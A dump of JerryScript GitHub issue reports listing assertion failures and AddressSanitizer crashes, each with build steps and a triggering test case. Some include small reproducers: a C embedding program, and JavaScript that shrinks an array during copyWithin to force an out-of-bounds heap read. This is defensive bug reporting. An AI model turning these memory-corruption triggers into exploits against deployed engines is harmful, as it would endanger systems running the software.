- built-ins/TypedArray/prototype/reduce/BigInt/callbackfn-arguments-default-accumulator.js
- built-ins/TypedArray/prototype/reduce/BigInt/callbackfn-detachbuffer.js
- built-ins/TypedArray/prototype/reduce/BigInt/get-length-uses-internal-arraylength.js
- ...
###### Output
```
ICE: Assertion 'ecma_is_value_number (get_value)' failed at /home/oszi/jerryscript/jerry-core/ecma/builtin-objects/typedarray/ecma-builtin-typedarray-prototype.c(ecma_builtin_typedarray_prototype_reduce_with_direction):326.
Error: ERR_FAILED_INTERNAL_ASSERTION
```
###### Expected behavior
not assert
similar issue : #4215 | Assertion 'ecma_is_value_number (get_value)' in ecma_builtin_typedarray_prototype_reduce_with_direction | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4219/comments | 1 | 2020-09-23T12:08:21Z | 2020-12-15T10:14:59Z | https://github.com/jerryscript-project/jerryscript/issues/4219 | 707,304,796 | 4,219 |
[
"jerryscript-project",
"jerryscript"
]
| ###### JerryScript revision
3c723c9bc1aec08a54bc44bba7987e4324f440e4
(latest master - 2020.09.21.)
###### Build platform
Ubuntu 18.04.5 LTS (Linux 4.15.0-112-generic x86_64)
###### Build steps
tools/build.py --debug --logging=on --error-messages=on --line-info=on
###### Test case
found by test262-esnext test:
- built-ins/TypedArray/prototype/find/BigInt/return-found-value-predicate-result-is-true.js (only in strict mode)
In non-strict mode this test fails, but not asserts. The error message in non-strict mode: "Error: ERR_DISABLED_BYTE_CODE"
###### Output
```
ICE: Assertion '((jmem_cpointer_t) uint_ptr) == uint_ptr' failed at /home/oszi/jerryscript/jerry-core/jmem/jmem-allocator.c(jmem_decompress_pointer):219.
Error: ERR_FAILED_INTERNAL_ASSERTION
```
###### Expected behavior
no assert | Assertion '((jmem_cpointer_t) uint_ptr) == uint_ptr' in jmem_decompress_pointer | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4218/comments | 2 | 2020-09-23T12:03:29Z | 2020-09-30T12:27:24Z | https://github.com/jerryscript-project/jerryscript/issues/4218 | 707,301,495 | 4,218 |
[
"jerryscript-project",
"jerryscript"
]
| ###### JerryScript revision
3c723c9bc1aec08a54bc44bba7987e4324f440e4
(latest master - 2020.09.21.)
###### Build platform
Ubuntu 18.04.5 LTS (Linux 4.15.0-112-generic x86_64)
###### Build steps
tools/build.py --debug --logging=on --error-messages=on --line-info=on
###### Test case
found by test262-esnext tests:
- built-ins/TypedArray/prototype/toLocaleString/BigInt/calls-tolocalestring-from-each-value.js
- built-ins/TypedArray/prototype/toLocaleString/BigInt/calls-tostring-from-each-value.js
- built-ins/TypedArray/prototype/toLocaleString/BigInt/calls-valueof-from-each-value.js
- built-ins/TypedArray/prototype/toLocaleString/BigInt/get-length-uses-internal-arraylength.js
- built-ins/TypedArray/prototype/toLocaleString/BigInt/return-abrupt-from-firstelement-tolocalestring.js
- built-ins/TypedArray/prototype/toLocaleString/BigInt/return-abrupt-from-firstelement-tostring.js
- built-ins/TypedArray/prototype/toLocaleString/BigInt/return-abrupt-from-firstelement-valueof.js
- built-ins/TypedArray/prototype/toLocaleString/BigInt/return-abrupt-from-nextelement-tolocalestring.js
- built-ins/TypedArray/prototype/toLocaleString/BigInt/return-abrupt-from-nextelement-tostring.js
- built-ins/TypedArray/prototype/toLocaleString/BigInt/return-abrupt-from-nextelement-valueof.js
###### Output
```
ICE: Assertion '!ECMA_IS_VALUE_ERROR (element_obj)' failed at /home/oszi/jerryscript/jerry-core/ecma/builtin-objects/typedarray/ecma-builtin-typedarray-prototype.c(ecma_builtin_typedarray_prototype_to_locale_string_helper):1566.
Error: ERR_FAILED_INTERNAL_ASSERTION
```
###### Expected behavior
no assert | Assertion '!ECMA_IS_VALUE_ERROR (element_obj) in ecma_builtin_typedarray_prototype_to_locale_string_helper | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4217/comments | 1 | 2020-09-23T11:05:08Z | 2020-10-22T10:49:41Z | https://github.com/jerryscript-project/jerryscript/issues/4217 | 707,265,126 | 4,217 |
[
"jerryscript-project",
"jerryscript"
]
| ###### JerryScript revision
3c723c9bc1aec08a54bc44bba7987e4324f440e4
(latest master - 2020.09.21.)
###### Build platform
Ubuntu 18.04.5 LTS (Linux 4.15.0-112-generic x86_64)
###### Build steps
tools/build.py --debug --logging=on --error-messages=on --line-info=on
###### Test case
found by test262-esnext test:
- built-ins/TypedArray/prototype/find/BigInt/predicate-call-changes-value
###### Output
```
ICE: Assertion 'next_offset == JMEM_HEAP_END_OF_LIST || jmem_is_heap_pointer (JMEM_HEAP_GET_ADDR_FROM_OFFSET (next_offset))' failed at /home/oszi/jerryscript/jerry-core/jmem/jmem-heap.c(jmem_heap_alloc):187.Error: ERR_FAILED_INTERNAL_ASSERTION
```
###### Expected behavior
no assert | Assertion 'next_offset == JMEM_HEAP_END_OF_LIST ... in jmem_heap_alloc | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4216/comments | 2 | 2020-09-23T10:58:47Z | 2020-09-30T12:34:23Z | https://github.com/jerryscript-project/jerryscript/issues/4216 | 707,261,254 | 4,216 |
[
"jerryscript-project",
"jerryscript"
]
| ###### JerryScript revision
3c723c9bc1aec08a54bc44bba7987e4324f440e4
(latest master - 2020.09.21.)
###### Build platform
Ubuntu 18.04.5 LTS (Linux 4.15.0-112-generic x86_64)
###### Build steps
tools/build.py --debug --logging=on --error-messages=on --line-info=on
###### Test case
found by test262-esnext tests:
- built-ins/TypedArray/prototype/filter/BigInt/*
eg:
- built-ins/TypedArray/prototype/filter/BigInt/arraylength-internal.js
- built-ins/TypedArray/prototype/filter/BigInt/callbackfn-arguments-with-thisarg.js
- ...
###### Output
```
ICE: Assertion 'ecma_is_value_number (get_value)' failed at /home/oszi/jerryscript/jerry-core/ecma/builtin-objects/typedarray/ecma-builtin-typedarray-prototype.c(ecma_builtin_typedarray_prototype_filter):403.
Error: ERR_FAILED_INTERNAL_ASSERTION
```
###### Expected behavior
not assert
similar issue: #4219 | Assertion 'ecma_is_value_number (get_value) in ecma_builtin_typedarray_prototype_filter | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4215/comments | 1 | 2020-09-23T10:55:29Z | 2020-12-15T10:14:59Z | https://github.com/jerryscript-project/jerryscript/issues/4215 | 707,259,116 | 4,215 |
[
"jerryscript-project",
"jerryscript"
]
| ###### JerryScript revision
3c723c9bc1aec08a54bc44bba7987e4324f440e4
(latest master - 2020.09.21.)
###### Build platform
Ubuntu 18.04.5 LTS (Linux 4.15.0-112-generic x86_64)
###### Build steps
./tools/build.py --clean --debug --logging=on --error-messages=on
###### Test case
found by test262-esnext test:
- built-ins/Promise/race/resolved-then-catch-finally
##### Output
```
ICE: Assertion 'ECMA_STRING_IS_REF_EQUALS_TO_ONE (string_p)' failed at /home/oszi/jerryscript/jerry-core/ecma/base/ecma-literal-storage.c(ec
ma_free_string_list):77.
```
###### Expected behavior
no mem leak | Memory leak in ecma-literal-storage | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4214/comments | 1 | 2020-09-23T10:48:21Z | 2020-10-29T09:50:37Z | https://github.com/jerryscript-project/jerryscript/issues/4214 | 707,254,708 | 4,214 |
[
"jerryscript-project",
"jerryscript"
]
| ###### JerryScript revision
3c723c9bc1aec08a54bc44bba7987e4324f440e4
(latest master - 2020.09.21.)
###### Build platform
Ubuntu 18.04.5 LTS (Linux 4.15.0-112-generic x86_64)
###### Build steps
./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --compile-flag=-g --strip=off --system-allocator=on --logging=on --linker-flag=-fuse-ld=gold --error-messages=on --stack-limit=16
###### Test case
found by test262-esnext tests:
- built-ins/TypedArray/prototype/find/BigInt/get-length-ignores-length-prop.js
- built-ins/TypedArray/prototype/find/BigInt/predicate-call-changes-value.js
- built-ins/TypedArray/prototype/find/BigInt/return-found-value-predicate-result-is-true.js
###### Output
```
==19500==ERROR: AddressSanitizer: heap-use-after-free on address 0xf5c00e90 at pc 0x566397e8 bp 0xffde8848 sp 0xffde8838
READ of size 4 at 0xf5c00e90 thread T0
#0 0x566397e7 in ecma_ref_extended_primitive /home/oszi/jerryscript/jerry-core/ecma/base/ecma-helpers.c:1229
#1 0x566418a0 in ecma_copy_value /home/oszi/jerryscript/jerry-core/ecma/base/ecma-helpers-value.c:906
#2 0x5674199a in ecma_fast_copy_value /home/oszi/jerryscript/jerry-core/ecma/base/ecma-helpers-value.c:940
#3 0x5674199a in vm_init_exec /home/oszi/jerryscript/jerry-core/vm/vm.c:4802
#4 0x567471e1 in vm_run /home/oszi/jerryscript/jerry-core/vm/vm.c:4938
#5 0x5669a3ee in ecma_op_function_call_simple /home/oszi/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:980
#6 0x5669b7bb in ecma_op_function_call /home/oszi/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1182
#7 0x5674655f in opfunc_call /home/oszi/jerryscript/jerry-core/vm/vm.c:804
#8 0x5674655f in vm_execute /home/oszi/jerryscript/jerry-core/vm/vm.c:4838
#9 0x567471e8 in vm_run /home/oszi/jerryscript/jerry-core/vm/vm.c:4939
#10 0x5669a3ee in ecma_op_function_call_simple /home/oszi/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:980
#11 0x5669b7bb in ecma_op_function_call /home/oszi/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1182
#12 0x5674655f in opfunc_call /home/oszi/jerryscript/jerry-core/vm/vm.c:804
#13 0x5674655f in vm_execute /home/oszi/jerryscript/jerry-core/vm/vm.c:4838
#14 0x567471e8 in vm_run /home/oszi/jerryscript/jerry-core/vm/vm.c:4939
#15 0x5669a3ee in ecma_op_function_call_simple /home/oszi/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:980
#16 0x5669b7bb in ecma_op_function_call /home/oszi/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1182
#17 0x5674655f in opfunc_call /home/oszi/jerryscript/jerry-core/vm/vm.c:804
#18 0x5674655f in vm_execute /home/oszi/jerryscript/jerry-core/vm/vm.c:4838
#19 0x567471e8 in vm_run /home/oszi/jerryscript/jerry-core/vm/vm.c:4939
#20 0x56634892 in vm_run_global /home/oszi/jerryscript/jerry-core/vm/vm.c:340
#21 0x56634892 in jerry_run /home/oszi/jerryscript/jerry-core/api/jerry.c:589
#22 0x566104bd in main /home/oszi/jerryscript/jerry-main/main-unix.c:123
#23 0xf773be90 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18e90)
#24 0x56612663 (/home/oszi/jerryscript/build/tests/test262_tests_esnext/local/bin/jerry+0xf663)
0xf5c00e90 is located 0 bytes inside of 16-byte region [0xf5c00e90,0xf5c00ea0)
freed by thread T0 here:
#0 0xf7a02b94 in __interceptor_free (/usr/lib32/libasan.so.4+0xe5b94)
#1 0x56612584 in jmem_heap_free_block_internal /home/oszi/jerryscript/jerry-core/jmem/jmem-heap.c:478
#2 0x566e0018 in ecma_builtin_typedarray_prototype_find_helper /home/oszi/jerryscript/jerry-core/ecma/builtin-objects/typedarray/ecma-builtin-typedarray-prototype.c:1240
#3 0x566e0018 in ecma_builtin_typedarray_prototype_dispatch_routine /home/oszi/jerryscript/jerry-core/ecma/builtin-objects/typedarray/ecma-builtin-typedarray-prototype.c:1840
#4 0x5669b1cd in ecma_builtin_dispatch_routine /home/oszi/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1181
#5 0x5669b1cd in ecma_builtin_dispatch_call /home/oszi/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1205
#6 0x5669b1cd in ecma_op_function_call_simple /home/oszi/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:878
#7 0x5669b7bb in ecma_op_function_call /home/oszi/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1182
#8 0x5674655f in opfunc_call /home/oszi/jerryscript/jerry-core/vm/vm.c:804
#9 0x5674655f in vm_execute /home/oszi/jerryscript/jerry-core/vm/vm.c:4838
#10 0x567471e8 in vm_run /home/oszi/jerryscript/jerry-core/vm/vm.c:4939
#11 0x5669a3ee in ecma_op_function_call_simple /home/oszi/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:980
#12 0x5669b7bb in ecma_op_function_call /home/oszi/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1182
#13 0x5674655f in opfunc_call /home/oszi/jerryscript/jerry-core/vm/vm.c:804
#14 0x5674655f in vm_execute /home/oszi/jerryscript/jerry-core/vm/vm.c:4838
#15 0x567471e8 in vm_run /home/oszi/jerryscript/jerry-core/vm/vm.c:4939
#16 0x5669a3ee in ecma_op_function_call_simple /home/oszi/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:980
#17 0x5669b7bb in ecma_op_function_call /home/oszi/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1182
#18 0x5674655f in opfunc_call /home/oszi/jerryscript/jerry-core/vm/vm.c:804
#19 0x5674655f in vm_execute /home/oszi/jerryscript/jerry-core/vm/vm.c:4838
#20 0x567471e8 in vm_run /home/oszi/jerryscript/jerry-core/vm/vm.c:4939
#21 0x56634892 in vm_run_global /home/oszi/jerryscript/jerry-core/vm/vm.c:340
#22 0x56634892 in jerry_run /home/oszi/jerryscript/jerry-core/api/jerry.c:589
#23 0x566104bd in main /home/oszi/jerryscript/jerry-main/main-unix.c:123
#24 0xf773be90 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18e90)
previously allocated by thread T0 here:
#0 0xf7a02f54 in malloc (/usr/lib32/libasan.so.4+0xe5f54)
#1 0x5661236a in jmem_heap_alloc /home/oszi/jerryscript/jerry-core/jmem/jmem-heap.c:254
#2 0x56676689 in jmem_heap_gc_and_alloc_block.lto_priv.58 /home/oszi/jerryscript/jerry-core/jmem/jmem-heap.c:291
#3 0x56706fd7 in jmem_heap_alloc_block_null_on_error /home/oszi/jerryscript/jerry-core/jmem/jmem-heap.c:343
#4 0x56706fd7 in ecma_bigint_create /home/oszi/jerryscript/jerry-core/ecma/operations/ecma-big-uint.c:51
#5 0x567169cf in ecma_bigint_create_from_digits.constprop.8 /home/oszi/jerryscript/jerry-core/ecma/operations/ecma-bigint.c:701
#6 0x56662498 in ecma_typedarray_get_bigint64_element.lto_priv.185 /home/oszi/jerryscript/jerry-core/ecma/operations/ecma-typedarray-object.c:179
#7 0x566dff67 in ecma_builtin_typedarray_prototype_find_helper /home/oszi/jerryscript/jerry-core/ecma/builtin-objects/typedarray/ecma-builtin-typedarray-prototype.c:1235
#8 0x566dff67 in ecma_builtin_typedarray_prototype_dispatch_routine /home/oszi/jerryscript/jerry-core/ecma/builtin-objects/typedarray/ecma-builtin-typedarray-prototype.c:1840
#9 0x5669b1cd in ecma_builtin_dispatch_routine /home/oszi/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1181
#10 0x5669b1cd in ecma_builtin_dispatch_call /home/oszi/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1205
#11 0x5669b1cd in ecma_op_function_call_simple /home/oszi/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:878
#12 0x5669b7bb in ecma_op_function_call /home/oszi/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1182
#13 0x5674655f in opfunc_call /home/oszi/jerryscript/jerry-core/vm/vm.c:804
#14 0x5674655f in vm_execute /home/oszi/jerryscript/jerry-core/vm/vm.c:4838
#15 0x567471e8 in vm_run /home/oszi/jerryscript/jerry-core/vm/vm.c:4939
#16 0x5669a3ee in ecma_op_function_call_simple /home/oszi/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:980
#17 0x5669b7bb in ecma_op_function_call /home/oszi/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1182
#18 0x5674655f in opfunc_call /home/oszi/jerryscript/jerry-core/vm/vm.c:804
#19 0x5674655f in vm_execute /home/oszi/jerryscript/jerry-core/vm/vm.c:4838
#20 0x567471e8 in vm_run /home/oszi/jerryscript/jerry-core/vm/vm.c:4939
#21 0x5669a3ee in ecma_op_function_call_simple /home/oszi/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:980
#22 0x5669b7bb in ecma_op_function_call /home/oszi/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1182
#23 0x5674655f in opfunc_call /home/oszi/jerryscript/jerry-core/vm/vm.c:804
#24 0x5674655f in vm_execute /home/oszi/jerryscript/jerry-core/vm/vm.c:4838
#25 0x567471e8 in vm_run /home/oszi/jerryscript/jerry-core/vm/vm.c:4939
#26 0x56634892 in vm_run_global /home/oszi/jerryscript/jerry-core/vm/vm.c:340
#27 0x56634892 in jerry_run /home/oszi/jerryscript/jerry-core/api/jerry.c:589
#28 0x566104bd in main /home/oszi/jerryscript/jerry-main/main-unix.c:123
#29 0xf773be90 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18e90)
SUMMARY: AddressSanitizer: heap-use-after-free /home/oszi/jerryscript/jerry-core/ecma/base/ecma-helpers.c:1229 in ecma_ref_extended_primitive
Shadow bytes around the buggy address:
0x3eb80180: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3eb80190: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3eb801a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3eb801b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3eb801c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x3eb801d0: fa fa[fd]fd fa fa 00 fa fa fa 00 00 fa fa 00 00
0x3eb801e0: fa fa 00 00 fa fa fd fd fa fa fd fd fa fa 00 04
0x3eb801f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3eb80200: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3eb80210: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3eb80220: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==19500==ABORTING
```
###### Expected behavior
not heap use after free | heap-use-after-free in bigint/TypedArray related code path | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4213/comments | 1 | 2020-09-23T10:14:45Z | 2020-09-28T08:48:15Z | https://github.com/jerryscript-project/jerryscript/issues/4213 | 707,232,837 | 4,213 |
[
"jerryscript-project",
"jerryscript"
]
| ###### JerryScript revision
3c723c9bc1aec08a54bc44bba7987e4324f440e4
(latest master - 2020.09.21.)
###### Build platform
Ubuntu 18.04.5 LTS (Linux 4.15.0-112-generic x86_64)
###### Build steps
./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --compile-flag=-g --strip=off --system-allocator=on --logging=on --linker-flag=-fuse-ld=gold --error-messages=on --stack-limit=16
###### Test case
found by test262-esnext tests:
- language/asi/S7.9_A5.7_T1.js
- language/asi/S7.9_A9_T6.js
- language/asi/S7.9_A9_T7.js
- language/statements/try/S12.14_A16_T1.js
###### Output
```
READ of size 1 at 0xf57029de thread T0
#0 0x565d168f in main_print_unhandled_exception /home/oszi/jerryscript/jerry-main/main-utils.c:182
#1 0x565abbb8 in main /home/oszi/jerryscript/jerry-main/main-unix.c:140
#2 0xf7794e90 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18e90)
#3 0x565ad663 (/home/oszi/jerryscript/build/tests/test262_tests_esnext/local/bin/jerry+0xf663)
[1600854654.57]
0xf57029de is located 0 bytes to the right of 3422-byte region [0xf5701c80,0xf57029de)
allocated by thread T0 here:
#0 0xf7a5bf54 in malloc (/usr/lib32/libasan.so.4+0xe5f54)
#1 0x566b62e4 in jerry_port_read_source /home/oszi/jerryscript/jerry-port/default/default-module.c:58
#2 0x565d1194 in main_print_unhandled_exception /home/oszi/jerryscript/jerry-main/main-utils.c:161
#3 0x565abbb8 in main /home/oszi/jerryscript/jerry-main/main-unix.c:140
#4 0xf7794e90 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18e90)
```
###### Expected behavior
not heap buffer overflow | heap-buffer-overflow in main_print_unhandled_exception | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4212/comments | 2 | 2020-09-23T09:58:13Z | 2020-09-29T08:40:09Z | https://github.com/jerryscript-project/jerryscript/issues/4212 | 707,221,462 | 4,212 |
[
"jerryscript-project",
"jerryscript"
]
| ###### JerryScript revision
5555453 (latest master)
###### Build platform
Arch Linux (Linux 5.8.8-zen1-1-zen x86_64)
###### Build steps
```sh
tools/build.py --clean --debug --error-messages=on --line-info=on --logging=on
```
###### Test case
main.c:
```c
#include <stdio.h>
#include <stdlib.h>
#include "jerryscript.h"
#include "jerryscript-port-default.h"
#include "jerryscript-ext/handler.h"
static jerry_value_t handler_trace(const jerry_value_t func_obj,
const jerry_value_t this,
const jerry_value_t argv[],
const jerry_length_t argc)
{
if (!jerry_is_feature_enabled(JERRY_FEATURE_LINE_INFO))
printf("Backtrace not available\n");
jerry_value_t backtrace_array = jerry_get_backtrace(0);
int array_length = jerry_get_array_length(backtrace_array);
for (int i = 0; i < array_length; i++) {
jerry_char_t buf[256];
jerry_value_t e = jerry_get_property_by_index(backtrace_array, i);
jerry_size_t copied_bytes = jerry_substring_to_utf8_char_buffer(e,
0, sizeof(buf) - 1, buf, sizeof(buf) - 1);
buf[copied_bytes] = '\0';
printf("%d: %s\n", i, buf);
jerry_release_value(e);
}
jerry_release_value(backtrace_array);
return jerry_create_undefined();
}
int main()
{
jerry_char_t resource_name[] = "main.js";
size_t resource_name_size = sizeof(resource_name) - 1;
jerry_char_t *script;
size_t script_size;
jerry_init(JERRY_INIT_EMPTY);
jerryx_handler_register_global((const jerry_char_t *)"trace", handler_trace);
script = jerry_port_read_source(resource_name, &script_size);
jerry_value_t parsed_code = jerry_parse(resource_name,
resource_name_size,
script,
script_size,
JERRY_PARSE_NO_OPTS);
if (!jerry_value_is_error(parsed_code)) {
jerry_value_t ret_value = jerry_run(parsed_code);
jerry_release_value(ret_value);
} else {
printf("parse failed\n");
}
jerry_port_release_source(script);
jerry_release_value(parsed_code);
jerry_cleanup();
return 0;
}
```
main.js:
```js
import { my_trace } from "./module.js"
my_trace();
```
module.js:
```js
export function my_trace() {
trace();
}
```
###### Execution steps
```sh
gcc -g -fsanitize=address -o main main.c -ljerry-core -ljerry-port-default -ljerry-ext -lm
./main
```
###### Output
```
==1214488==ERROR: AddressSanitizer: memcpy-param-overlap: memory ranges [0x558fc8ddbcc9,0x558fc8ddebf1) and [0x558fc8ddbaa4, 0x558fc8dde9cc) overlap
#0 0x7fa6eedf00ee in __interceptor_memcpy /build/gcc/src/gcc/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:806
#1 0x558fc8bf665e in ecma_string_copy_to_cesu8_buffer /home/test/jerryscript/jerry-core/ecma/base/ecma-helpers-string.c:1068
#2 0x558fc8bfd74c in ecma_stringbuilder_append /home/test/jerryscript/jerry-core/ecma/base/ecma-helpers-string.c:2788
#3 0x558fc8c9f9e0 in vm_get_backtrace /home/test/jerryscript/jerry-core/vm/vm-utils.c:89
#4 0x558fc8be44bf in jerry_get_backtrace /home/test/jerryscript/jerry-core/api/jerry.c:4037
#5 0x558fc8bdc6fe in handler_trace /home/test/jerryscript/tmp/main.c:15
#6 0x558fc8c33215 in ecma_op_function_call_native /home/test/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1041
#7 0x558fc8c338b7 in ecma_op_function_call /home/test/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1187
#8 0x558fc8ca1a75 in opfunc_call /home/test/jerryscript/jerry-core/vm/vm.c:791
#9 0x558fc8cb7a1f in vm_execute /home/test/jerryscript/jerry-core/vm/vm.c:4789
#10 0x558fc8cb7fa6 in vm_run /home/test/jerryscript/jerry-core/vm/vm.c:4891
#11 0x558fc8c32fb9 in ecma_op_function_call_simple /home/test/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:976
#12 0x558fc8c33896 in ecma_op_function_call /home/test/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1183
#13 0x558fc8ca1a75 in opfunc_call /home/test/jerryscript/jerry-core/vm/vm.c:791
#14 0x558fc8cb7a1f in vm_execute /home/test/jerryscript/jerry-core/vm/vm.c:4789
#15 0x558fc8cb7fa6 in vm_run /home/test/jerryscript/jerry-core/vm/vm.c:4891
#16 0x558fc8ca0395 in vm_run_global /home/test/jerryscript/jerry-core/vm/vm.c:340
#17 0x558fc8bdd74c in jerry_run /home/test/jerryscript/jerry-core/api/jerry.c:589
#18 0x558fc8bdcae8 in main /home/test/jerryscript/tmp/main.c:53
#19 0x7fa6eeacf151 in __libc_start_main (/usr/lib/libc.so.6+0x28151)
#20 0x558fc8bdc55d in _start (/home/test/jerryscript/tmp/main+0x4e55d)
0x558fc8ddbcc9 is located 1257 bytes inside of global variable 'jerry_global_heap' defined in '/home/test/jerryscript/jerry-core/jcontext/jcontext.c:139:13' (0x558fc8ddb7e0) of size 524288
0x558fc8ddbaa4 is located 708 bytes inside of global variable 'jerry_global_heap' defined in '/home/test/jerryscript/jerry-core/jcontext/jcontext.c:139:13' (0x558fc8ddb7e0) of size 524288
SUMMARY: AddressSanitizer: memcpy-param-overlap /build/gcc/src/gcc/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:806 in __interceptor_memcpy
==1214488==ABORTING
```
###### Expected behavior
Print a JavaScript backtrace and not crash. | Crash on printing a backtrace from an imported function | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4205/comments | 3 | 2020-09-19T02:06:39Z | 2020-09-29T12:09:45Z | https://github.com/jerryscript-project/jerryscript/issues/4205 | 704,747,413 | 4,205 |
[
"jerryscript-project",
"jerryscript"
]
| ###### JerryScript revision
74f66879c2700ca315de6ab52b56b365fc58eac7
(latest master - 2020.09.18.)
###### Build platform
Ubuntu 18.04.5 LTS (Linux 4.15.0-112-generic x86_64)
###### Build steps
./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --compile-flag=-g --strip=off --system-allocator=on --logging=on --linker-flag=-fuse-ld=gold --error-messages=on --stack-limit=16
###### Test case
found by test262-esnext built-ins/Array/prototype/copyWithin/coerced-values-start-change-target.js
Similar issue to #4146 (same test case, but got heap buffer overflow instead of assertion).
note: Can't be reproduced with the simplified tests/jerry/es.next/regression-test-issue-4146.js .
little bit smaller test case (without test harness files)
```
function longDenseArray(){
var a = [0];
for(var i = 0; i < 1024; i++){
a[i] = i;
}
return a;
}
function shorten(){
currArray.length = 20;
return 1;
}
var currArray = longDenseArray();
currArray.copyWithin(1000, {valueOf: shorten})
```
###### Output
```
=================================================================
==32501==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xf4d02cc0 at pc 0x566c4a7f bp 0xffaff058 sp 0xffaff048
READ of size 4 at 0xf4d02cc0 thread T0
#0 0x566c4a7e in ecma_builtin_array_prototype_object_copy_within /home/oszi/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:2526
#1 0x566c676e in ecma_builtin_array_prototype_dispatch_routine /home/oszi/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:3089
#2 0x56797428 in ecma_builtin_dispatch_routine /home/oszi/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1181
#3 0x56797600 in ecma_builtin_dispatch_call /home/oszi/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1205
#4 0x567706f9 in ecma_op_function_call_simple /home/oszi/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:878
#5 0x56771623 in ecma_op_function_call /home/oszi/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1183
#6 0x566e7d68 in opfunc_call /home/oszi/jerryscript/jerry-core/vm/vm.c:791
#7 0x566ffd95 in vm_execute /home/oszi/jerryscript/jerry-core/vm/vm.c:4789
#8 0x5670030d in vm_run /home/oszi/jerryscript/jerry-core/vm/vm.c:4891
#9 0x566e6420 in vm_run_global /home/oszi/jerryscript/jerry-core/vm/vm.c:340
#10 0x567b2f0f in jerry_run /home/oszi/jerryscript/jerry-core/api/jerry.c:589
#11 0x567ac89b in main /home/oszi/jerryscript/jerry-main/main-unix.c:123
#12 0xf774ae90 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18e90)
#13 0x56653920 (/home/oszi/jerryscript/build/bin/jerry+0x1c920)
Address 0xf4d02cc0 is a wild pointer.
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/oszi/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:2526 in ecma_builtin_array_prototype_object_copy_within
Shadow bytes around the buggy address:
0x3e9a0540: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3e9a0550: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3e9a0560: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3e9a0570: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3e9a0580: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x3e9a0590: fa fa fa fa fa fa fa fa[fa]fa fa fa fa fa fa fa
0x3e9a05a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
